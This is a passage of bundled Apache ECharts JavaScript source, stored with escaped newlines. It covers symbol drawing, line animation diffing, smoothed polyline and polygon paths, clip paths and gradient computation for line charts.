this._data;\n    if (data) {\n        // Not use animation\n        data.eachItemGraphicEl(function (el, idx) {\n            var point = data.getItemLayout(idx);\n            el.attr('position', point);\n        });\n    }\n};\n\nsymbolDrawProto.incrementalPrepareUpdate = function (data) {\n    this._seriesScope = makeSeriesScope(data);\n    this._data = null;\n    this.group.removeAll();\n};\n\n/**\n * Update symbols draw by new data\n * @param {module:echarts/data/List} data\n * @param {Object} [opt] Or isIgnore\n * @param {Function} [opt.isIgnore]\n * @param {Object} [opt.clipShape]\n */\nsymbolDrawProto.incrementalUpdate = function (taskParams, data, opt) {\n    opt = normalizeUpdateOpt(opt);\n\n    function updateIncrementalAndHover(el) {\n        if (!el.isGroup) {\n            el.incremental = el.useHoverLayer = true;\n        }\n    }\n    for (var idx = taskParams.start; idx < taskParams.end; idx++) {\n        var point = data.getItemLayout(idx);\n        if (symbolNeedsDraw(data, point, idx, opt)) {\n            var el = new this._symbolCtor(data, idx, this._seriesScope);\n            el.traverse(updateIncrementalAndHover);\n            el.attr('position', point);\n            this.group.add(el);\n            data.setItemGraphicEl(idx, el);\n        }\n    }\n};\n\nfunction normalizeUpdateOpt(opt) {\n    if (opt != null && !isObject$1(opt)) {\n        opt = {isIgnore: opt};\n    }\n    return opt || {};\n}\n\nsymbolDrawProto.remove = function (enableAnimation) {\n    var group = this.group;\n    var data = this._data;\n    // Incremental model do not have this._data.\n    if (data && enableAnimation) {\n        data.eachItemGraphicEl(function (el) {\n            el.fadeOut(function () {\n                group.remove(el);\n            });\n        });\n    }\n    else {\n        group.removeAll();\n    }\n};\n\nfunction makeSeriesScope(data) {\n    var seriesModel = data.hostModel;\n    return {\n        itemStyle: seriesModel.getModel('itemStyle').getItemStyle(['color']),\n        hoverItemStyle: seriesModel.getModel('emphasis.itemStyle').getItemStyle(),\n        symbolRotate: seriesModel.get('symbolRotate'),\n        symbolOffset: seriesModel.get('symbolOffset'),\n        hoverAnimation: seriesModel.get('hoverAnimation'),\n        labelModel: seriesModel.getModel('label'),\n        hoverLabelModel: seriesModel.getModel('emphasis.label'),\n        cursorStyle: seriesModel.get('cursor')\n    };\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n/**\n * @param {Object} coordSys\n * @param {module:echarts/data/List} data\n * @param {string} valueOrigin lineSeries.option.areaStyle.origin\n */\nfunction prepareDataCoordInfo(coordSys, data, valueOrigin) {\n    var baseAxis = coordSys.getBaseAxis();\n    var valueAxis = coordSys.getOtherAxis(baseAxis);\n    var valueStart = getValueStart(valueAxis, valueOrigin);\n\n    var baseAxisDim = baseAxis.dim;\n    var valueAxisDim = valueAxis.dim;\n    var valueDim = data.mapDimension(valueAxisDim);\n    var baseDim = data.mapDimension(baseAxisDim);\n    var baseDataOffset = valueAxisDim === 'x' || valueAxisDim === 'radius' ? 1 : 0;\n\n    var dims = map(coordSys.dimensions, function (coordDim) {\n        return data.mapDimension(coordDim);\n    });\n\n    var stacked;\n    var stackResultDim = data.getCalculationInfo('stackResultDimension');\n    if (stacked |= isDimensionStacked(data, dims[0] /*, dims[1]*/)) { // jshint ignore:line\n        dims[0] = stackResultDim;\n    }\n    if (stacked |= isDimensionStacked(data, dims[1] /*, dims[0]*/)) { // jshint ignore:line\n        dims[1] = stackResultDim;\n    }\n\n    return {\n        dataDimsForPoint: dims,\n        valueStart: valueStart,\n        valueAxisDim: valueAxisDim,\n        baseAxisDim: baseAxisDim,\n        stacked: !!stacked,\n        valueDim: valueDim,\n        baseDim: baseDim,\n        baseDataOffset: baseDataOffset,\n        stackedOverDimension: data.getCalculationInfo('stackedOverDimension')\n    };\n}\n\nfunction getValueStart(valueAxis, valueOrigin) {\n    var valueStart = 0;\n    var extent = valueAxis.scale.getExtent();\n\n    if (valueOrigin === 'start') {\n        valueStart = extent[0];\n    }\n    else if (valueOrigin === 'end') {\n        valueStart = extent[1];\n    }\n    // auto\n    else {\n        // Both positive\n        if (extent[0] > 0) {\n            valueStart = extent[0];\n        }\n        // Both negative\n        else if (extent[1] < 0) {\n            valueStart = extent[1];\n        }\n        // If is one positive, and one negative, onZero shall be true\n    }\n\n    return valueStart;\n}\n\nfunction getStackedOnPoint(dataCoordInfo, coordSys, data, idx) {\n    var value = NaN;\n    if (dataCoordInfo.stacked) {\n        value = data.get(data.getCalculationInfo('stackedOverDimension'), idx);\n    }\n    if (isNaN(value)) {\n        value = dataCoordInfo.valueStart;\n    }\n\n    var baseDataOffset = dataCoordInfo.baseDataOffset;\n    var stackedData = [];\n    stackedData[baseDataOffset] = data.get(dataCoordInfo.baseDim, idx);\n    stackedData[1 - baseDataOffset] = value;\n\n    return coordSys.dataToPoint(stackedData);\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// var arrayDiff = require('zrender/src/core/arrayDiff');\n// 'zrender/src/core/arrayDiff' has been used before, but it did\n// not do well in performance when roam with fixed dataZoom window.\n\n// function convertToIntId(newIdList, oldIdList) {\n//     // Generate int id instead of string id.\n//     // Compare string maybe slow in score function of arrDiff\n\n//     // Assume id in idList are all unique\n//     var idIndicesMap = {};\n//     var idx = 0;\n//     for (var i = 0; i < newIdList.length; i++) {\n//         idIndicesMap[newIdList[i]] = idx;\n//         newIdList[i] = idx++;\n//     }\n//     for (var i = 0; i < oldIdList.length; i++) {\n//         var oldId = oldIdList[i];\n//         // Same with newIdList\n//         if (idIndicesMap[oldId]) {\n//             oldIdList[i] = idIndicesMap[oldId];\n//         }\n//         else {\n//             oldIdList[i] = idx++;\n//         }\n//     }\n// }\n\nfunction diffData(oldData, newData) {\n    var diffResult = [];\n\n    newData.diff(oldData)\n        .add(function (idx) {\n            diffResult.push({cmd: '+', idx: idx});\n        })\n        .update(function (newIdx, oldIdx) {\n            diffResult.push({cmd: '=', idx: oldIdx, idx1: newIdx});\n        })\n        .remove(function (idx) {\n            diffResult.push({cmd: '-', idx: idx});\n        })\n        .execute();\n\n    return diffResult;\n}\n\nvar lineAnimationDiff = function (\n    oldData, newData,\n    oldStackedOnPoints, newStackedOnPoints,\n    oldCoordSys, newCoordSys,\n    oldValueOrigin, newValueOrigin\n) {\n    var diff = diffData(oldData, newData);\n\n    // var newIdList = newData.mapArray(newData.getId);\n    // var oldIdList = oldData.mapArray(oldData.getId);\n\n    // convertToIntId(newIdList, oldIdList);\n\n    // // FIXME One data ?\n    // diff = arrayDiff(oldIdList, newIdList);\n\n    var currPoints = [];\n    var nextPoints = [];\n    // Points for stacking base line\n    var currStackedPoints = [];\n    var nextStackedPoints = [];\n\n    var status = [];\n    var sortedIndices = [];\n    var rawIndices = [];\n\n    var newDataOldCoordInfo = prepareDataCoordInfo(oldCoordSys, newData, oldValueOrigin);\n    var oldDataNewCoordInfo = prepareDataCoordInfo(newCoordSys, oldData, newValueOrigin);\n\n    for (var i = 0; i < diff.length; i++) {\n        var diffItem = diff[i];\n        var pointAdded = true;\n\n        // FIXME, animation is not so perfect when dataZoom window moves fast\n        // Which is in case remvoing or add more than one data in the tail or head\n        switch (diffItem.cmd) {\n            case '=':\n                var currentPt = oldData.getItemLayout(diffItem.idx);\n                var nextPt = newData.getItemLayout(diffItem.idx1);\n                // If previous data is NaN, use next point directly\n                if (isNaN(currentPt[0]) || isNaN(currentPt[1])) {\n                    currentPt = nextPt.slice();\n                }\n                currPoints.push(currentPt);\n                nextPoints.push(nextPt);\n\n                currStackedPoints.push(oldStackedOnPoints[diffItem.idx]);\n                nextStackedPoints.push(newStackedOnPoints[diffItem.idx1]);\n\n                rawIndices.push(newData.getRawIndex(diffItem.idx1));\n                break;\n            case '+':\n                var idx = diffItem.idx;\n                currPoints.push(\n                    oldCoordSys.dataToPoint([\n                        newData.get(newDataOldCoordInfo.dataDimsForPoint[0], idx),\n                        newData.get(newDataOldCoordInfo.dataDimsForPoint[1], idx)\n                    ])\n                );\n\n                nextPoints.push(newData.getItemLayout(idx).slice());\n\n                currStackedPoints.push(\n                    getStackedOnPoint(newDataOldCoordInfo, oldCoordSys, newData, idx)\n                );\n                nextStackedPoints.push(newStackedOnPoints[idx]);\n\n                rawIndices.push(newData.getRawIndex(idx));\n                break;\n            case '-':\n                var idx = diffItem.idx;\n                var rawIndex = oldData.getRawIndex(idx);\n                // Data is replaced. In the case of dynamic data queue\n                // FIXME FIXME FIXME\n                if (rawIndex !== idx) {\n                    currPoints.push(oldData.getItemLayout(idx));\n                    nextPoints.push(newCoordSys.dataToPoint([\n                        oldData.get(oldDataNewCoordInfo.dataDimsForPoint[0], idx),\n                        oldData.get(oldDataNewCoordInfo.dataDimsForPoint[1], idx)\n                    ]));\n\n                    currStackedPoints.push(oldStackedOnPoints[idx]);\n                    nextStackedPoints.push(\n                        getStackedOnPoint(oldDataNewCoordInfo, newCoordSys, oldData, idx)\n                    );\n\n                    rawIndices.push(rawIndex);\n                }\n                else {\n                    pointAdded = false;\n                }\n        }\n\n        // Original indices\n        if (pointAdded) {\n            status.push(diffItem);\n            sortedIndices.push(sortedIndices.length);\n        }\n    }\n\n    // Diff result may be crossed if all items are changed\n    // Sort by data index\n    sortedIndices.sort(function (a, b) {\n        return rawIndices[a] - rawIndices[b];\n    });\n\n    var sortedCurrPoints = [];\n    var sortedNextPoints = [];\n\n    var sortedCurrStackedPoints = [];\n    var sortedNextStackedPoints = [];\n\n    var sortedStatus = [];\n    for (var i = 0; i < sortedIndices.length; i++) {\n        var idx = sortedIndices[i];\n        sortedCurrPoints[i] = currPoints[idx];\n        sortedNextPoints[i] = nextPoints[idx];\n\n        sortedCurrStackedPoints[i] = currStackedPoints[idx];\n        sortedNextStackedPoints[i] = nextStackedPoints[idx];\n\n        sortedStatus[i] = status[idx];\n    }\n\n    return {\n        current: sortedCurrPoints,\n        next: sortedNextPoints,\n\n        stackedOnCurrent: sortedCurrStackedPoints,\n        stackedOnNext: sortedNextStackedPoints,\n\n        status: sortedStatus\n    };\n};\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// Poly path support NaN point\n\nvar vec2Min = min;\nvar vec2Max = max;\n\nvar scaleAndAdd$1 = scaleAndAdd;\nvar v2Copy = copy;\n\n// Temporary variable\nvar v = [];\nvar cp0 = [];\nvar cp1 = [];\n\nfunction isPointNull(p) {\n    return isNaN(p[0]) || isNaN(p[1]);\n}\n\nfunction drawSegment(\n    ctx, points, start, segLen, allLen,\n    dir, smoothMin, smoothMax, smooth, smoothMonotone, connectNulls\n) {\n    // if (smoothMonotone == null) {\n    //     if (isMono(points, 'x')) {\n    //         return drawMono(ctx, points, start, segLen, allLen,\n    //             dir, smoothMin, smoothMax, smooth, 'x', connectNulls);\n    //     }\n    //     else if (isMono(points, 'y')) {\n    //         return drawMono(ctx, points, start, segLen, allLen,\n    //             dir, smoothMin, smoothMax, smooth, 'y', connectNulls);\n    //     }\n    //     else {\n    //         return drawNonMono.apply(this, arguments);\n    //     }\n    // }\n    // else if (smoothMonotone !== 'none' && isMono(points, smoothMonotone)) {\n    //     return drawMono.apply(this, arguments);\n    // }\n    // else {\n    //     return drawNonMono.apply(this, arguments);\n    // }\n    if (smoothMonotone === 'none' || !smoothMonotone) {\n        return drawNonMono.apply(this, arguments);\n    }\n    else {\n        return drawMono.apply(this, arguments);\n    }\n}\n\n/**\n * Check if points is in monotone.\n *\n * @param {number[][]} points         Array of points which is in [x, y] form\n * @param {string}     smoothMonotone 'x', 'y', or 'none', stating for which\n *                                    dimension that is checking.\n *                                    If is 'none', `drawNonMono` should be\n *                                    called.\n *                                    If is undefined, either being monotone\n *                                    in 'x' or 'y' will call `drawMono`.\n */\n// function isMono(points, smoothMonotone) {\n//     if (points.length <= 1) {\n//         return true;\n//     }\n\n//     var dim = smoothMonotone === 'x' ? 0 : 1;\n//     var last = points[0][dim];\n//     var lastDiff = 0;\n//     for (var i = 1; i < points.length; ++i) {\n//         var diff = points[i][dim] - last;\n//         if (!isNaN(diff) && !isNaN(lastDiff)\n//             && diff !== 0 && lastDiff !== 0\n//             && ((diff >= 0) !== (lastDiff >= 0))\n//         ) {\n//             return false;\n//         }\n//         if (!isNaN(diff) && diff !== 0) {\n//             lastDiff = diff;\n//             last = points[i][dim];\n//         }\n//     }\n//     return true;\n// }\n\n/**\n * Draw smoothed line in monotone, in which only vertical or horizontal bezier\n * control points will be used. This should be used when points are monotone\n * either in x or y dimension.\n */\nfunction drawMono(\n    ctx, points, start, segLen, allLen,\n    dir, smoothMin, smoothMax, smooth, smoothMonotone, connectNulls\n) {\n    var prevIdx = 0;\n    var idx = start;\n    for (var k = 0; k < segLen; k++) {\n        var p = points[idx];\n        if (idx >= allLen || idx < 0) {\n            break;\n        }\n        if (isPointNull(p)) {\n            if (connectNulls) {\n                idx += dir;\n                continue;\n            }\n            break;\n        }\n\n        if (idx === start) {\n            ctx[dir > 0 ? 'moveTo' : 'lineTo'](p[0], p[1]);\n        }\n        else {\n            if (smooth > 0) {\n                var prevP = points[prevIdx];\n                var dim = smoothMonotone === 'y' ? 1 : 0;\n\n                // Length of control point to p, either in x or y, but not both\n                var ctrlLen = (p[dim] - prevP[dim]) * smooth;\n\n                v2Copy(cp0, prevP);\n                cp0[dim] = prevP[dim] + ctrlLen;\n\n                v2Copy(cp1, p);\n                cp1[dim] = p[dim] - ctrlLen;\n\n                ctx.bezierCurveTo(\n                    cp0[0], cp0[1],\n                    cp1[0], cp1[1],\n                    p[0], p[1]\n                );\n            }\n            else {\n                ctx.lineTo(p[0], p[1]);\n            }\n        }\n\n        prevIdx = idx;\n        idx += dir;\n    }\n\n    return k;\n}\n\n/**\n * Draw smoothed line in non-monotone, in may cause undesired curve in extreme\n * situations. This should be used when points are non-monotone neither in x or\n * y dimension.\n */\nfunction drawNonMono(\n    ctx, points, start, segLen, allLen,\n    dir, smoothMin, smoothMax, smooth, smoothMonotone, connectNulls\n) {\n    var prevIdx = 0;\n    var idx = start;\n    for (var k = 0; k < segLen; k++) {\n        var p = points[idx];\n        if (idx >= allLen || idx < 0) {\n            break;\n        }\n        if (isPointNull(p)) {\n            if (connectNulls) {\n                idx += dir;\n                continue;\n            }\n            break;\n        }\n\n        if (idx === start) {\n            ctx[dir > 0 ? 'moveTo' : 'lineTo'](p[0], p[1]);\n            v2Copy(cp0, p);\n        }\n        else {\n            if (smooth > 0) {\n                var nextIdx = idx + dir;\n                var nextP = points[nextIdx];\n                if (connectNulls) {\n                    // Find next point not null\n                    while (nextP && isPointNull(points[nextIdx])) {\n                        nextIdx += dir;\n                        nextP = points[nextIdx];\n                    }\n                }\n\n                var ratioNextSeg = 0.5;\n                var prevP = points[prevIdx];\n                var nextP = points[nextIdx];\n                // Last point\n                if (!nextP || isPointNull(nextP)) {\n                    v2Copy(cp1, p);\n                }\n                else {\n                    // If next data is null in not connect case\n                    if (isPointNull(nextP) && !connectNulls) {\n                        nextP = p;\n                    }\n\n                    sub(v, nextP, prevP);\n\n                    var lenPrevSeg;\n                    var lenNextSeg;\n                    if (smoothMonotone === 'x' || smoothMonotone === 'y') {\n                        var dim = smoothMonotone === 'x' ? 0 : 1;\n                        lenPrevSeg = Math.abs(p[dim] - prevP[dim]);\n                        lenNextSeg = Math.abs(p[dim] - nextP[dim]);\n                    }\n                    else {\n                        lenPrevSeg = dist(p, prevP);\n                        lenNextSeg = dist(p, nextP);\n                    }\n\n                    // Use ratio of seg length\n                    ratioNextSeg = lenNextSeg / (lenNextSeg + lenPrevSeg);\n\n                    scaleAndAdd$1(cp1, p, v, -smooth * (1 - ratioNextSeg));\n                }\n                // Smooth constraint\n                vec2Min(cp0, cp0, smoothMax);\n                vec2Max(cp0, cp0, smoothMin);\n                vec2Min(cp1, cp1, smoothMax);\n                vec2Max(cp1, cp1, smoothMin);\n\n                ctx.bezierCurveTo(\n                    cp0[0], cp0[1],\n                    cp1[0], cp1[1],\n                    p[0], p[1]\n                );\n                // cp0 of next segment\n                scaleAndAdd$1(cp0, p, v, smooth * ratioNextSeg);\n            }\n            else {\n                ctx.lineTo(p[0], p[1]);\n            }\n        }\n\n        prevIdx = idx;\n        idx += dir;\n    }\n\n    return k;\n}\n\nfunction getBoundingBox(points, smoothConstraint) {\n    var ptMin = [Infinity, Infinity];\n    var ptMax = [-Infinity, -Infinity];\n    if (smoothConstraint) {\n        for (var i = 0; i < points.length; i++) {\n            var pt = points[i];\n            if (pt[0] < ptMin[0]) {\n                ptMin[0] = pt[0];\n            }\n            if (pt[1] < ptMin[1]) {\n                ptMin[1] = pt[1];\n            }\n            if (pt[0] > ptMax[0]) {\n                ptMax[0] = pt[0];\n            }\n            if (pt[1] > ptMax[1]) {\n                ptMax[1] = pt[1];\n            }\n        }\n    }\n    return {\n        min: smoothConstraint ? ptMin : ptMax,\n        max: smoothConstraint ? ptMax : ptMin\n    };\n}\n\nvar Polyline$1 = Path.extend({\n\n    type: 'ec-polyline',\n\n    shape: {\n        points: [],\n\n        smooth: 0,\n\n        smoothConstraint: true,\n\n        smoothMonotone: null,\n\n        connectNulls: false\n    },\n\n    style: {\n        fill: null,\n\n        stroke: '#000'\n    },\n\n    brush: fixClipWithShadow(Path.prototype.brush),\n\n    buildPath: function (ctx, shape) {\n        var points = shape.points;\n\n        var i = 0;\n        var len$$1 = points.length;\n\n        var result = getBoundingBox(points, shape.smoothConstraint);\n\n        if (shape.connectNulls) {\n            // Must remove first and last null values avoid draw error in polygon\n            for (; len$$1 > 0; len$$1--) {\n                if (!isPointNull(points[len$$1 - 1])) {\n                    break;\n                }\n            }\n            for (; i < len$$1; i++) {\n                if (!isPointNull(points[i])) {\n                    break;\n                }\n            }\n        }\n        while (i < len$$1) {\n            i += drawSegment(\n                ctx, points, i, len$$1, len$$1,\n                1, result.min, result.max, shape.smooth,\n                shape.smoothMonotone, shape.connectNulls\n            ) + 1;\n        }\n    }\n});\n\nvar Polygon$1 = Path.extend({\n\n    type: 'ec-polygon',\n\n    shape: {\n        points: [],\n\n        // Offset between stacked base points and points\n        stackedOnPoints: [],\n\n        smooth: 0,\n\n        stackedOnSmooth: 0,\n\n        smoothConstraint: true,\n\n        smoothMonotone: null,\n\n        connectNulls: false\n    },\n\n    brush: fixClipWithShadow(Path.prototype.brush),\n\n    buildPath: function (ctx, shape) {\n        var points = shape.points;\n        var stackedOnPoints = shape.stackedOnPoints;\n\n        var i = 0;\n        var len$$1 = points.length;\n        var smoothMonotone = shape.smoothMonotone;\n        var bbox = getBoundingBox(points, shape.smoothConstraint);\n        var stackedOnBBox = getBoundingBox(stackedOnPoints, shape.smoothConstraint);\n\n        if (shape.connectNulls) {\n            // Must remove first and last null values avoid draw error in polygon\n            for (; len$$1 > 0; len$$1--) {\n                if (!isPointNull(points[len$$1 - 1])) {\n                    break;\n                }\n            }\n            for (; i < len$$1; i++) {\n                if (!isPointNull(points[i])) {\n                    break;\n                }\n            }\n        }\n        while (i < len$$1) {\n            var k = drawSegment(\n                ctx, points, i, len$$1, len$$1,\n                1, bbox.min, bbox.max, shape.smooth,\n                smoothMonotone, shape.connectNulls\n            );\n            drawSegment(\n                ctx, stackedOnPoints, i + k - 1, k, len$$1,\n                -1, stackedOnBBox.min, stackedOnBBox.max, shape.stackedOnSmooth,\n                smoothMonotone, shape.connectNulls\n            );\n            i += k + 1;\n\n            ctx.closePath();\n        }\n    }\n});\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\nfunction createGridClipPath(cartesian, hasAnimation, seriesModel) {\n    var rect = cartesian.getArea();\n    var isHorizontal = cartesian.getBaseAxis().isHorizontal();\n\n    var x = rect.x;\n    var y = rect.y;\n    var width = rect.width;\n    var height = rect.height;\n\n    var lineWidth = seriesModel.get('lineStyle.width') || 2;\n    // Expand the clip path a bit to avoid the border is clipped and looks thinner\n    x -= lineWidth / 2;\n    y -= lineWidth / 2;\n    width += lineWidth;\n    height += lineWidth;\n\n    var clipPath = new Rect({\n        shape: {\n            x: x,\n            y: y,\n            width: width,\n            height: height\n        }\n    });\n\n    if (hasAnimation) {\n        clipPath.shape[isHorizontal ? 'width' : 'height'] = 0;\n        initProps(clipPath, {\n            shape: {\n                width: width,\n                height: height\n            }\n        }, seriesModel);\n    }\n\n    return clipPath;\n}\n\nfunction createPolarClipPath(polar, hasAnimation, seriesModel) {\n    var sectorArea = polar.getArea();\n    // Avoid float number rounding error for symbol on the edge of axis extent.\n\n    var clipPath = new Sector({\n        shape: {\n            cx: round$1(polar.cx, 1),\n            cy: round$1(polar.cy, 1),\n            r0: round$1(sectorArea.r0, 1),\n            r: round$1(sectorArea.r, 1),\n            startAngle: sectorArea.startAngle,\n            endAngle: sectorArea.endAngle,\n            clockwise: sectorArea.clockwise\n        }\n    });\n\n    if (hasAnimation) {\n        clipPath.shape.endAngle = sectorArea.startAngle;\n        initProps(clipPath, {\n            shape: {\n                endAngle: sectorArea.endAngle\n            }\n        }, seriesModel);\n    }\n    return clipPath;\n}\n\nfunction createClipPath(coordSys, hasAnimation, seriesModel) {\n    if (!coordSys) {\n        return null;\n    }\n    else if (coordSys.type === 'polar') {\n        return createPolarClipPath(coordSys, hasAnimation, seriesModel);\n    }\n    else if (coordSys.type === 'cartesian2d') {\n        return createGridClipPath(coordSys, hasAnimation, seriesModel);\n    }\n    return null;\n}\n\n/*\n* Licensed to the Apache Software Foundation (ASF) under one\n* or more contributor license agreements.  See the NOTICE file\n* distributed with this work for additional information\n* regarding copyright ownership.  The ASF licenses this file\n* to you under the Apache License, Version 2.0 (the\n* \"License\"); you may not use this file except in compliance\n* with the License.  You may obtain a copy of the License at\n*\n*   http://www.apache.org/licenses/LICENSE-2.0\n*\n* Unless required by applicable law or agreed to in writing,\n* software distributed under the License is distributed on an\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n* KIND, either express or implied.  See the License for the\n* specific language governing permissions and limitations\n* under the License.\n*/\n\n// FIXME step not support polar\n\nfunction isPointsSame(points1, points2) {\n    if (points1.length !== points2.length) {\n        return;\n    }\n    for (var i = 0; i < points1.length; i++) {\n        var p1 = points1[i];\n        var p2 = points2[i];\n        if (p1[0] !== p2[0] || p1[1] !== p2[1]) {\n            return;\n        }\n    }\n    return true;\n}\n\nfunction getSmooth(smooth) {\n    return typeof (smooth) === 'number' ? smooth : (smooth ? 0.5 : 0);\n}\n\n/**\n * @param {module:echarts/coord/cartesian/Cartesian2D|module:echarts/coord/polar/Polar} coordSys\n * @param {module:echarts/data/List} data\n * @param {Object} dataCoordInfo\n * @param {Array.<Array.<number>>} points\n */\nfunction getStackedOnPoints(coordSys, data, dataCoordInfo) {\n    if (!dataCoordInfo.valueDim) {\n        return [];\n    }\n\n    var points = [];\n    for (var idx = 0, len = data.count(); idx < len; idx++) {\n        points.push(getStackedOnPoint(dataCoordInfo, coordSys, data, idx));\n    }\n\n    return points;\n}\n\nfunction turnPointsIntoStep(points, coordSys, stepTurnAt) {\n    var baseAxis = coordSys.getBaseAxis();\n    var baseIndex = baseAxis.dim === 'x' || baseAxis.dim === 'radius' ? 0 : 1;\n\n    var stepPoints = [];\n    for (var i = 0; i < points.length - 1; i++) {\n        var nextPt = points[i + 1];\n        var pt = points[i];\n        stepPoints.push(pt);\n\n        var stepPt = [];\n        switch (stepTurnAt) {\n            case 'end':\n                stepPt[baseIndex] = nextPt[baseIndex];\n                stepPt[1 - baseIndex] = pt[1 - baseIndex];\n                // default is start\n                stepPoints.push(stepPt);\n                break;\n            case 'middle':\n                // default is start\n                var middle = (pt[baseIndex] + nextPt[baseIndex]) / 2;\n                var stepPt2 = [];\n                stepPt[baseIndex] = stepPt2[baseIndex] = middle;\n                stepPt[1 - baseIndex] = pt[1 - baseIndex];\n                stepPt2[1 - baseIndex] = nextPt[1 - baseIndex];\n                stepPoints.push(stepPt);\n                stepPoints.push(stepPt2);\n                break;\n            default:\n                stepPt[baseIndex] = pt[baseIndex];\n                stepPt[1 - baseIndex] = nextPt[1 - baseIndex];\n                // default is start\n                stepPoints.push(stepPt);\n        }\n    }\n    // Last points\n    points[i] && stepPoints.push(points[i]);\n    return stepPoints;\n}\n\nfunction getVisualGradient(data, coordSys) {\n    var visualMetaList = data.getVisual('visualMeta');\n    if (!visualMetaList || !visualMetaList.length || !data.count()) {\n        // When data.count() is 0, gradient range can not be calculated.\n        return;\n    }\n\n    if (coordSys.type !== 'cartesian2d') {\n        if (__DEV__) {\n            console.warn('Visual map on line style is only supported on cartesian2d.');\n        }\n        return;\n    }\n\n    var coordDim;\n    var visualMeta;\n\n    for (var i = visualMetaList.length - 1; i >= 0; i--) {\n        var dimIndex = visualMetaList[i].dimension;\n        var dimName = data.dimensions[dimIndex];\n        var dimInfo = data.getDimensionInfo(dimName);\n        coordDim = dimInfo && dimInfo.coordDim;\n        // Can only be x or y\n        if (coordDim === 'x' || coordDim === 'y') {\n            visualMeta = visualMetaList[i];\n            break;\n        }\n    }\n\n    if (!visualMeta) {\n        if (__DEV__) {\n            console.warn('Visual map on line style only support x or y dimension.');\n        }\n        return;\n    }\n\n    // If the area to be rendered is bigger than area defined by LinearGradient,\n    // the canvas spec prescribes that the color of the first stop and the last\n    // stop should be used. But if two stops are added at offset 0, in effect\n    // browsers use the color of the second stop to render area outside\n    // LinearGradient. So we can only infinitesimally extend area defined in\n    // LinearGradient to render `outerColors`.\n\n    var axis = coordSys.getAxis(coordDim);\n\n    // dataToCoor mapping may not be linear, but must be monotonic.\n    var colorStops = map(visualMeta.stops, function (stop) {\n        return {\n            coord: axis.toGlobalCoord(axis.dataToCoord(stop.value)),\n            color: stop.color\n        };\n    });\n    var stopLen = colorStops.length;\n    var outerColors = visualMeta.outerColors.slice();\n\n    if (stopLen && colorStops[0].coord > colorStops[stopLen - 1].coord) {\n        colorStops.reverse();\n        outerColors.reverse();\n    }\n\n    var tinyExtent = 10; // Arbitrary value: 10px\n    var minCoord = colorStops[0].coord - tinyExtent;\n    var maxCoord = colorStops[stopLen - 1].coord + tinyExtent;\n    var coordSpan = maxCoord - minCoord;\n\n    if (coordSpan < 1e-3) {\n        return 'transparent';\n    }\n\n    each$1(colorStops, function (stop) {\n        stop.offset = (stop.coord - minCoord) / coordSpan;\n    });\n    colorStops.push({\n        offset: stopLen ? colorStops[stopLen - 1].offset : 0.5,\n        color: outerColors[1] || 'transparent'\n    });\n    colorStops.unshift({ // notice colorStops.length have been changed.\n        offset: stopLen ? colorStops[0].offset : 0.5,\n        color: outerColors[0] || 'transparent'\n    });\n\n    // zrUtil.each(colorStops, function (colorStop) {\n    //     // Make sure each offset has rounded px to avoid not sharp edge\n    //     colorStop.offset = (Math.round(colorStop.offset * (end - start) + start) - start) / (end - start);\n    // });\n\n    var gradient = new LinearGradient(0, 0, 0, 0, colorStops, true);\n    gradient[coordDim] = minCoord;\n    gradient[coordDim + '2'] = maxCoord;\n\n    return gradient;\n}\n\nfunction getIsIgnoreFunc(seriesModel, data, coordSys) {\n    var showAllSymbol = seriesModel.get('showAllSymbol');\n    var isAuto = showAllSymbol === 'auto';\n\n    if (showAllSymbol && !isAuto) {\n        return;\n    }\n\n    var categoryAxis = coordSys.getAxesByScale('ordinal')[0];\n    if (!categoryAxis) {\n        return;\n    }\n\n    // Note that category label interval strategy might bring some weird effect\n    // in some scenario: users may wonder why some of the symbols are not\n    // displayed. So we show all symbols as possible as we can.\n    if (isAuto\n        // Simplify the logic, do not determine label overlap here.\n        && canShowAllSymbolForCategory(categoryAxis, data)\n    ) {\n        return;\n    }\n\n    // Otherwise follow the label interval strategy on category axis.\n    var categoryDataDim = data.mapDimension(categoryAxis.dim);\n    var labelMap = {};\n\n    each$1(categoryAxis.getViewLabels(), function (labelItem) {\n        